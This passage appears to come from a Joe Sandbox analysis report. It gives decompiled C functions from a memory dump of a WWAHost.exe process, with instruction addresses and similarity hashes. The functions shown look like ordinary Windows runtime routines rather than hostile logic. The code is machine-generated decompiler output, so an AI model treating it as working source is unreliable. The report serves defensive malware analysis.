                                              							if(_t109 == 3) {
                                              								L55:
                                              								__eflags = _t114 - _t109;
                                              								if(_t114 != _t109) {
                                              									L59:
                                              									_t122 = 0xc0000024;
                                              									L15:
                                              									_t78 = _v1052;
                                              									__eflags = _t78;
                                              									if(_t78 != 0) {
                                              										L039777F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                              									}
                                              									_t68 = _t122;
                                              									goto L4;
                                              								}
                                              								_t110 = _v1056;
                                              								_t118 =  *((intOrPtr*)(_t102 + 8));
                                              								_v1060 = _t118;
                                              								__eflags = _t110;
                                              								if(_t110 == 0) {
                                              									L10:
                                              									_t122 = 0x80000005;
                                              									L11:
                                              									_t81 = _v1040;
                                              									__eflags = _t81;
                                              									if(_t81 == 0) {
                                              										goto L15;
                                              									}
                                              									__eflags = _t122;
                                              									if(_t122 >= 0) {
                                              										L14:
                                              										 *_t81 = _t118;
                                              										goto L15;
                                              									}
                                              									__eflags = _t122 - 0x80000005;
                                              									if(_t122 != 0x80000005) {
                                              										goto L15;
                                              									}
                                              									goto L14;
                                              								}
                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                              									goto L10;
                                              								}
                                              								_push( *((intOrPtr*)(_t102 + 8)));
                                              								_t59 = _t102 + 0xc; // 0xc
                                              								_push(_t110);
                                              								L54:
                                              								E0399F3E0();
                                              								_t125 = _t125 + 0xc;
                                              								goto L11;
                                              							}
                                              							__eflags = _t109 - 7;
                                              							if(_t109 == 7) {
                                              								goto L55;
                                              							}
                                              							_t118 = 4;
                                              							__eflags = _t109 - _t118;
                                              							if(_t109 != _t118) {
                                              								__eflags = _t109 - 0xb;
                                              								if(_t109 != 0xb) {
                                              									__eflags = _t109 - 1;
                                              									if(_t109 == 1) {
                                              										__eflags = _t114 - _t118;
                                              										if(_t114 != _t118) {
                                              											_t118 =  *((intOrPtr*)(_t102 + 8));
                                              											_v1060 = _t118;
                                              											__eflags = _t118 - _t77;
                                              											if(_t118 > _t77) {
                                              												goto L10;
                                              											}
                                              											_push(_t118);
                                              											_t56 = _t102 + 0xc; // 0xc
                                              											_push(_v1056);
                                              											goto L54;
                                              										}
                                              										__eflags = _t77 - _t118;
                                              										if(_t77 != _t118) {
                                              											L34:
                                              											_t122 = 0xc0000004;
                                              											goto L15;
                                              										}
                                              										_t111 = _v1056;
                                              										__eflags = _t111 & 0x00000003;
                                              										if((_t111 & 0x00000003) == 0) {
                                              											_v1060 = _t118;
                                              											__eflags = _t111;
                                              											if(__eflags == 0) {
                                              												goto L10;
                                              											}
                                              											_t42 = _t102 + 0xc; // 0xc
                                              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                              											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                              											_push(_t111);
                                              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                              											_push(0);
                                              											_push( &_v1048);
                                              											_t122 = E039913C0(_t102, _t118, _t122, __eflags);
                                              											L44:
                                              											_t118 = _v1072;
                                              											goto L11;
                                              										}
                                              										_t122 = 0x80000002;
                                              										goto L15;
                                              									}
                                              									_t122 = 0xc0000024;
                                              									goto L44;
                                              								}
                                              								__eflags = _t114 - _t109;
                                              								if(_t114 != _t109) {
                                              									goto L59;
                                              								}
                                              								_t118 = 8;
                                              								__eflags = _t77 - _t118;
                                              								if(_t77 != _t118) {
                                              									goto L34;
                                              								}
                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                              									goto L34;
                                              								}
                                              								_t112 = _v1056;
                                              								_v1060 = _t118;
                                              								__eflags = _t112;
                                              								if(_t112 == 0) {
                                              									goto L10;
                                              								}
                                              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                              								goto L11;
                                              							}
                                              							__eflags = _t114 - _t118;
                                              							if(_t114 != _t118) {
                                              								goto L59;
                                              							}
                                              							__eflags = _t77 - _t118;
                                              							if(_t77 != _t118) {
                                              								goto L34;
                                              							}
                                              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                              								goto L34;
                                              							}
                                              							_t113 = _v1056;
                                              							_v1060 = _t118;
                                              							__eflags = _t113;
                                              							if(_t113 == 0) {
                                              								goto L10;
                                              							}
                                              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                              							goto L11;
                                              						}
                                              						_t118 =  *((intOrPtr*)(_t102 + 8));
                                              						__eflags = _t118 - _a20;
                                              						if(_t118 <= _a20) {
                                              							_t114 =  *(_t102 + 4);
                                              							_t77 = _t118;
                                              							goto L26;
                                              						}
                                              						_v1060 = _t118;
                                              						goto L10;
                                              					}
                                              					__eflags = _t122 - 0x80000005;
                                              					if(_t122 != 0x80000005) {
                                              						goto L15;
                                              					}
                                              					L039777F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                              					L18:
                                              					_t121 = _v1060;
                                              					goto L19;
                                              				}
                                              				_push( &_v1060);
                                              				_push(0x400);
                                              				_t102 =  &_v1036;
                                              				_push(_t102);
                                              				_push(2);
                                              				_push( &_v1048);
                                              				_push(_t116);
                                              				_t122 = E03999650();
                                              				if(_t122 >= 0) {
                                              					__eflags = 0;
                                              					_v1052 = 0;
                                              					goto L7;
                                              				}
                                              				if(_t122 == 0x80000005) {
                                              					goto L18;
                                              				}
                                              				goto L4;
                                              			}










































                                              0x039c7bd5
                                              0x039c7bd8
                                              0x00000000
                                              0x00000000
                                              0x039c7ba9
                                              0x039c7bac
                                              0x039c7bb0
                                              0x039c7bb1
                                              0x039c7bb1
                                              0x039c7bb6
                                              0x00000000
                                              0x039c7bb6
                                              0x039c7aa7
                                              0x039c7aaa
                                              0x00000000
                                              0x00000000
                                              0x039c7ab2
                                              0x039c7ab3
                                              0x039c7ab5
                                              0x039c7aec
                                              0x039c7aef
                                              0x039c7b25
                                              0x039c7b28
                                              0x039c7b62
                                              0x039c7b64
                                              0x039c7b8f
                                              0x039c7b92
                                              0x039c7b96
                                              0x039c7b98
                                              0x00000000
                                              0x00000000
                                              0x039c7b9e
                                              0x039c7b9f
                                              0x039c7ba3
                                              0x00000000
                                              0x039c7ba3
                                              0x039c7b66
                                              0x039c7b68
                                              0x039c7ae2
                                              0x039c7ae2
                                              0x00000000
                                              0x039c7ae2
                                              0x039c7b6e
                                              0x039c7b72
                                              0x039c7b75
                                              0x039c7b81
                                              0x039c7b85
                                              0x039c7b87
                                              0x00000000
                                              0x00000000
                                              0x039c7b31
                                              0x039c7b34
                                              0x039c7b3c
                                              0x039c7b45
                                              0x039c7b46
                                              0x039c7b4f
                                              0x039c7b51
                                              0x039c7b57
                                              0x039c7b59
                                              0x039c7b59
                                              0x00000000
                                              0x039c7b59
                                              0x039c7b77
                                              0x00000000
                                              0x039c7b77
                                              0x039c7b2a
                                              0x00000000
                                              0x039c7b2a
                                              0x039c7af1
                                              0x039c7af3
                                              0x00000000
                                              0x00000000
                                              0x039c7afb
                                              0x039c7afc
                                              0x039c7afe
                                              0x00000000
                                              0x00000000
                                              0x039c7b00
                                              0x039c7b03
                                              0x00000000
                                              0x00000000
                                              0x039c7b05
                                              0x039c7b09
                                              0x039c7b0d
                                              0x039c7b0f
                                              0x00000000
                                              0x00000000
                                              0x039c7b18
                                              0x039c7b1d
                                              0x00000000
                                              0x039c7b1d
                                              0x039c7ab7
                                              0x039c7ab9
                                              0x00000000
                                              0x00000000
                                              0x039c7abf
                                              0x039c7ac1
                                              0x00000000
                                              0x00000000
                                              0x039c7ac3
                                              0x039c7ac6
                                              0x00000000
                                              0x00000000
                                              0x039c7ac8
                                              0x039c7acc
                                              0x039c7ad0
                                              0x039c7ad2
                                              0x00000000
                                              0x00000000
                                              0x039c7adb
                                              0x00000000
                                              0x039c7adb
                                              0x039c79d6
                                              0x039c79d9
                                              0x039c79dc
                                              0x039c7a91
                                              0x039c7a94
                                              0x00000000
                                              0x039c7a94
                                              0x039c79e2
                                              0x00000000
                                              0x039c79e2
                                              0x039c7a74
                                              0x039c7a7a
                                              0x00000000
                                              0x00000000
                                              0x039c7a8a
                                              0x039c7a21
                                              0x039c7a21
                                              0x00000000
                                              0x039c7a21
                                              0x0395c650
                                              0x0395c651
                                              0x0395c656
                                              0x0395c65c
                                              0x0395c65d
                                              0x0395c663
                                              0x0395c664
                                              0x0395c66a
                                              0x0395c66e
                                              0x039c79c5
                                              0x039c79c7
                                              0x00000000
                                              0x039c79c7
                                              0x0395c67a
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d721c4453d7c79040ca94678c48355198adaba511c1dc09aeff607331d8afbaf
                                              • Instruction ID: e02f97a32f6b2b2f522c240cacdef1e0f758f23120346fda8db67faefc9d2747
                                              • Opcode Fuzzy Hash: d721c4453d7c79040ca94678c48355198adaba511c1dc09aeff607331d8afbaf
                                              • Instruction Fuzzy Hash: 9B816F756243829FDB25CE94C880A7AB7ADEB842D4F18486EED469B240D331DD41CFA3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 39%
                                              			E039EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                              				char _v8;
                                              				signed int _v12;
                                              				signed int _t80;
                                              				signed int _t83;
                                              				intOrPtr _t89;
                                              				signed int _t92;
                                              				signed char _t106;
                                              				signed int* _t107;
                                              				intOrPtr _t108;
                                              				intOrPtr _t109;
                                              				signed int _t114;
                                              				void* _t115;
                                              				void* _t117;
                                              				void* _t119;
                                              				void* _t122;
                                              				signed int _t123;
                                              				signed int* _t124;
                                              
                                              				_t106 = _a12;
                                              				if((_t106 & 0xfffffffc) != 0) {
                                              					return 0xc000000d;
                                              				}
                                              				if((_t106 & 0x00000002) != 0) {
                                              					_t106 = _t106 | 0x00000001;
                                              				}
                                              				_t109 =  *0x3a47b9c; // 0x0
                                              				_t124 = L03974620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                              				if(_t124 != 0) {
                                              					 *_t124 =  *_t124 & 0x00000000;
                                              					_t124[1] = _t124[1] & 0x00000000;
                                              					_t124[4] = _t124[4] & 0x00000000;
                                              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                              						L13:
                                              						_push(_t124);
                                              						if((_t106 & 0x00000002) != 0) {
                                              							_push(0x200);
                                              							_push(0x28);
                                              							_push(0xffffffff);
                                              							_t122 = E03999800();
                                              							if(_t122 < 0) {
                                              								L33:
                                              								if((_t124[4] & 0x00000001) != 0) {
                                              									_push(4);
                                              									_t64 =  &(_t124[1]); // 0x4
                                              									_t107 = _t64;
                                              									_push(_t107);
                                              									_push(5);
                                              									_push(0xfffffffe);
                                              									E039995B0();
                                              									if( *_t107 != 0) {
                                              										_push( *_t107);
                                              										E039995D0();
                                              									}
                                              								}
                                              								_push(_t124);
                                              								_push(0);
                                              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                              								L37:
                                              								L039777F0();
                                              								return _t122;
                                              							}
                                              							_t124[4] = _t124[4] | 0x00000002;
                                              							L18:
                                              							_t108 = _a8;
                                              							_t29 =  &(_t124[0x105]); // 0x414
                                              							_t80 = _t29;
                                              							_t30 =  &(_t124[5]); // 0x14
                                              							_t124[3] = _t80;
                                              							_t123 = 0;
                                              							_t124[2] = _t30;
                                              							 *_t80 = _t108;
                                              							if(_t108 == 0) {
                                              								L21:
                                              								_t112 = 0x400;
                                              								_push( &_v8);
                                              								_v8 = 0x400;
                                              								_push(_t124[2]);
                                              								_push(0x400);
                                              								_push(_t124[3]);
                                              								_push(0);
                                              								_push( *_t124);
                                              								_t122 = E03999910();
                                              								if(_t122 != 0xc0000023) {
                                              									L26:
                                              									if(_t122 != 0x106) {
                                              										L40:
                                              										if(_t122 < 0) {
                                              											L29:
                                              											_t83 = _t124[2];
                                              											if(_t83 != 0) {
                                              												_t59 =  &(_t124[5]); // 0x14
                                              												if(_t83 != _t59) {
                                              													L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                              												}
                                              											}
                                              											_push( *_t124);
                                              											E039995D0();
                                              											goto L33;
                                              										}
                                              										 *_a16 = _t124;
                                              										return 0;
                                              									}
                                              									if(_t108 != 1) {
                                              										_t122 = 0;
                                              										goto L40;
                                              									}
                                              									_t122 = 0xc0000061;
                                              									goto L29;
                                              								} else {
                                              									goto L22;
                                              								}
                                              								while(1) {
                                              									L22:
                                              									_t89 =  *0x3a47b9c; // 0x0
                                              									_t92 = L03974620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                              									_t124[2] = _t92;
                                              									if(_t92 == 0) {
                                              										break;
                                              									}
                                              									_t112 =  &_v8;
                                              									_push( &_v8);
                                              									_push(_t92);
                                              									_push(_v8);
                                              									_push(_t124[3]);
                                              									_push(0);
                                              									_push( *_t124);
                                              									_t122 = E03999910();
                                              									if(_t122 != 0xc0000023) {
                                              										goto L26;
                                              									}
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                              								}
                                              								_t122 = 0xc0000017;
                                              								goto L26;
                                              							}
                                              							_t119 = 0;
                                              							do {
                                              								_t114 = _t124[3];
                                              								_t119 = _t119 + 0xc;
                                              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                              								_t123 = _t123 + 1;
                                              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                              							} while (_t123 < _t108);
                                              							goto L21;
                                              						}
                                              						_push(0x28);
                                              						_push(3);
                                              						_t122 = E0395A7B0();
                                              						if(_t122 < 0) {
                                              							goto L33;
                                              						}
                                              						_t124[4] = _t124[4] | 0x00000001;
                                              						goto L18;
                                              					}
                                              					if((_t106 & 0x00000001) == 0) {
                                              						_t115 = 0x28;
                                              						_t122 = E039EE7D3(_t115, _t124);
                                              						if(_t122 < 0) {
                                              							L9:
                                              							_push(_t124);
                                              							_push(0);
                                              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                              							goto L37;
                                              						}
                                              						L12:
                                              						if( *_t124 != 0) {
                                              							goto L18;
                                              						}
                                              						goto L13;
                                              					}
                                              					_t15 =  &(_t124[1]); // 0x4
                                              					_t117 = 4;
                                              					_t122 = E039EE7D3(_t117, _t15);
                                              					if(_t122 >= 0) {
                                              						_t124[4] = _t124[4] | 0x00000001;
                                              						_v12 = _v12 & 0x00000000;
                                              						_push(4);
                                              						_push( &_v12);
                                              						_push(5);
                                              						_push(0xfffffffe);
                                              						E039995B0();
                                              						goto L12;
                                              					}
                                              					goto L9;
                                              				} else {
                                              					return 0xc0000017;
                                              				}
                                              			}




















                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039eb99e
                                              0x039eb951
                                              0x039eb954
                                              0x039eb95a
                                              0x039eb95e
                                              0x039eb972
                                              0x039eb979
                                              0x039eb97d
                                              0x039eb97f
                                              0x039eb980
                                              0x039eb982
                                              0x039eb984
                                              0x00000000
                                              0x039eb984
                                              0x00000000
                                              0x039eb926
                                              0x00000000
                                              0x039eb926

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e47f2532b5262224f4c4f5465f828c42fc9d963f2b9f93701b3bf61373be706d
                                              • Instruction ID: dbf4d75643c160cf2e050cd81588d32a458b40ddc5a096b0f1dbbdc7cad2ea8d
                                              • Opcode Fuzzy Hash: e47f2532b5262224f4c4f5465f828c42fc9d963f2b9f93701b3bf61373be706d
                                              • Instruction Fuzzy Hash: C9711F36204706EFEB32DF19C840F66BBE9EF80764F184928E6558B6E0DB71E941CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 79%
                                              			E039D6DC9(signed int __ecx, void* __edx) {
                                              				unsigned int _v8;
                                              				intOrPtr _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				char _v32;
                                              				char _v36;
                                              				char _v40;
                                              				char _v44;
                                              				char _v48;
                                              				char _v52;
                                              				char _v56;
                                              				char _v60;
                                              				void* _t87;
                                              				void* _t95;
                                              				signed char* _t96;
                                              				signed int _t107;
                                              				signed int _t136;
                                              				signed char* _t137;
                                              				void* _t157;
                                              				void* _t161;
                                              				void* _t167;
                                              				intOrPtr _t168;
                                              				void* _t174;
                                              				void* _t175;
                                              				signed int _t176;
                                              				void* _t177;
                                              
                                              				_t136 = __ecx;
                                              				_v44 = 0;
                                              				_t167 = __edx;
                                              				_v40 = 0;
                                              				_v36 = 0;
                                              				_v32 = 0;
                                              				_v60 = 0;
                                              				_v56 = 0;
                                              				_v52 = 0;
                                              				_v48 = 0;
                                              				_v16 = __ecx;
                                              				_t87 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                              				_t175 = _t87;
                                              				if(_t175 != 0) {
                                              					_t11 = _t175 + 0x30; // 0x30
                                              					 *((short*)(_t175 + 6)) = 0x14d4;
                                              					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                              					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                              					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                              					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                              					E039D6B4C(_t167, _t11, 0x214,  &_v8);
                                              					_v12 = _v8 + 0x10;
                                              					_t95 = E03977D50();
                                              					_t137 = 0x7ffe0384;
                                              					if(_t95 == 0) {
                                              						_t96 = 0x7ffe0384;
                                              					} else {
                                              						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              					}
                                              					_push(_t175);
                                              					_push(_v12);
                                              					_push(0x402);
                                              					_push( *_t96 & 0x000000ff);
                                              					E03999AE0();
                                              					_t87 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                              					_t176 = _v16;
                                              					if((_t176 & 0x00000100) != 0) {
                                              						_push( &_v36);
                                              						_t157 = 4;
                                              						_t87 = E039D795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                              						if(_t87 >= 0) {
                                              							_v24 = E039D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                              							_v28 = E039D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                              							_push( &_v52);
                                              							_t161 = 5;
                                              							_t168 = E039D795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                              							_v20 = _t168;
                                              							_t107 = L03974620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                              							_v16 = _t107;
                                              							if(_t107 != 0) {
                                              								_v8 = _v8 & 0x00000000;
                                              								 *(_t107 + 0x20) = _t176;
                                              								 *((short*)(_t107 + 6)) = 0x14d5;
                                              								_t47 = _t107 + 0x24; // 0x24
                                              								_t177 = _t47;
                                              								E039D6B4C( &_v36, _t177, 0xc78,  &_v8);
                                              								_t51 = _v8 + 4; // 0x4
                                              								_t178 = _t177 + (_v8 >> 1) * 2;
                                              								_v12 = _t51;
                                              								E039D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                              								_v12 = _v12 + _v8;
                                              								E039D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                              								_t125 = _v8;
                                              								_v12 = _v12 + _v8;
                                              								E039D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                              								_t174 = _v12 + _v8;
                                              								if(E03977D50() != 0) {
                                              									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              								}
                                              								_push(_v16);
                                              								_push(_t174);
                                              								_push(0x402);
                                              								_push( *_t137 & 0x000000ff);
                                              								E03999AE0();
                                              								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                              								_t168 = _v20;
                                              							}
                                              							_t87 = L03972400( &_v36);
                                              							if(_v24 >= 0) {
                                              								_t87 = L03972400( &_v44);
                                              							}
                                              							if(_t168 >= 0) {
                                              								_t87 = L03972400( &_v52);
                                              							}
                                              							if(_v28 >= 0) {
                                              								return L03972400( &_v60);
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return _t87;
                                              			}


                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction ID: c2924737dcab60ff6ec34d61e75d12ca30b45b35cbc20cc45fcbd506f2456713
                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction Fuzzy Hash: F2717075A00609EFCB10DFA9C944AEEFBB9FF88714F144469E505EB290D734EA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E039552A5(char __ecx) {
                                              				char _v20;
                                              				char _v28;
                                              				char _v29;
                                              				void* _v32;
                                              				void* _v36;
                                              				void* _v37;
                                              				void* _v38;
                                              				void* _v40;
                                              				void* _v46;
                                              				void* _v64;
                                              				void* __ebx;
                                              				intOrPtr* _t49;
                                              				signed int _t53;
                                              				short _t85;
                                              				signed int _t87;
                                              				signed int _t88;
                                              				signed int _t89;
                                              				intOrPtr _t101;
                                              				intOrPtr* _t102;
                                              				intOrPtr* _t104;
                                              				signed int _t106;
                                              				void* _t108;
                                              
                                              				_t93 = __ecx;
                                              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                              				_push(_t88);
                                              				_v29 = __ecx;
                                              				_t89 = _t88 | 0xffffffff;
                                              				while(1) {
                                              					E0396EEF0(0x3a479a0);
                                              					_t104 =  *0x3a48210; // 0xb52bb0
                                              					if(_t104 == 0) {
                                              						break;
                                              					}
                                              					asm("lock inc dword [esi]");
                                              					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                              					E0396EB70(_t93, 0x3a479a0);
                                              					if( *((char*)(_t108 + 0xf)) != 0) {
                                              						_t101 =  *0x7ffe02dc;
                                              						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                              							L9:
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0x90028);
                                              							_push(_t108 + 0x20);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push( *((intOrPtr*)(_t104 + 4)));
                                              							_t53 = E03999890();
                                              							__eflags = _t53;
                                              							if(_t53 >= 0) {
                                              								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                              									E0396EEF0(0x3a479a0);
                                              									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                              									E0396EB70(0, 0x3a479a0);
                                              								}
                                              								goto L3;
                                              							}
                                              							__eflags = _t53 - 0xc0000012;
                                              							if(__eflags == 0) {
                                              								L12:
                                              								_t13 = _t104 + 0xc; // 0xb52bbd
                                              								_t93 = _t13;
                                              								 *((char*)(_t108 + 0x12)) = 0;
                                              								__eflags = E0398F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                              								if(__eflags >= 0) {
                                              									L15:
                                              									_t102 = _v28;
                                              									 *_t102 = 2;
                                              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                              									E0396EEF0(0x3a479a0);
                                              									__eflags =  *0x3a48210 - _t104; // 0xb52bb0
                                              									if(__eflags == 0) {
                                              										__eflags =  *((char*)(_t108 + 0xe));
                                              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                              										 *0x3a48210 = _t102;
                                              										_t32 = _t102 + 0xc; // 0x0
                                              										 *_t95 =  *_t32;
                                              										_t33 = _t102 + 0x10; // 0x0
                                              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                              										_t35 = _t102 + 4; // 0xffffffff
                                              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                              										if(__eflags != 0) {
                                              											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                              											E039D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                              										}
                                              										E0396EB70(_t95, 0x3a479a0);
                                              										asm("lock xadd [esi], eax");
                                              										if(__eflags == 0) {
                                              											_push( *((intOrPtr*)(_t104 + 4)));
                                              											E039995D0();
                                              											L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                              										}
                                              										asm("lock xadd [esi], ebx");
                                              										__eflags = _t89 == 1;
                                              										if(_t89 == 1) {
                                              											_push( *((intOrPtr*)(_t104 + 4)));
                                              											E039995D0();
                                              											L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                              										}
                                              										_t49 = _t102;
                                              										L4:
                                              										return _t49;
                                              									}
                                              									E0396EB70(_t93, 0x3a479a0);
                                              									asm("lock xadd [esi], eax");
                                              									if(__eflags == 0) {
                                              										_push( *((intOrPtr*)(_t104 + 4)));
                                              										E039995D0();
                                              										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                              									}
                                              									 *_t102 = 1;
                                              									asm("lock xadd [edi], eax");
                                              									if(__eflags == 0) {
                                              										_t28 = _t102 + 4; // 0xffffffff
                                              										_push( *_t28);
                                              										E039995D0();
                                              										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                              									}
                                              									continue;
                                              								}
                                              								_t93 =  &_v20;
                                              								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                              								_t85 = 6;
                                              								_v20 = _t85;
                                              								_t87 = E0398F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                              								__eflags = _t87;
                                              								if(_t87 < 0) {
                                              									goto L3;
                                              								}
                                              								 *((char*)(_t108 + 0xe)) = 1;
                                              								goto L15;
                                              							}
                                              							__eflags = _t53 - 0xc000026e;
                                              							if(__eflags != 0) {
                                              								goto L3;
                                              							}
                                              							goto L12;
                                              						}
                                              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                              							goto L3;
                                              						} else {
                                              							goto L9;
                                              						}
                                              					}
                                              					L3:
                                              					_t49 = _t104;
                                              					goto L4;
                                              				}
                                              				_t49 = 0;
                                              				goto L4;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 560fab7eabfff61a9d6b1078af1cf6b71e4be5e4b825d4507055d9c818308c63
                                              • Instruction ID: 73ead8035fc10b5ecf366ad1e43e0dcb51d5410f1273ff0abb2dc0075c3971df
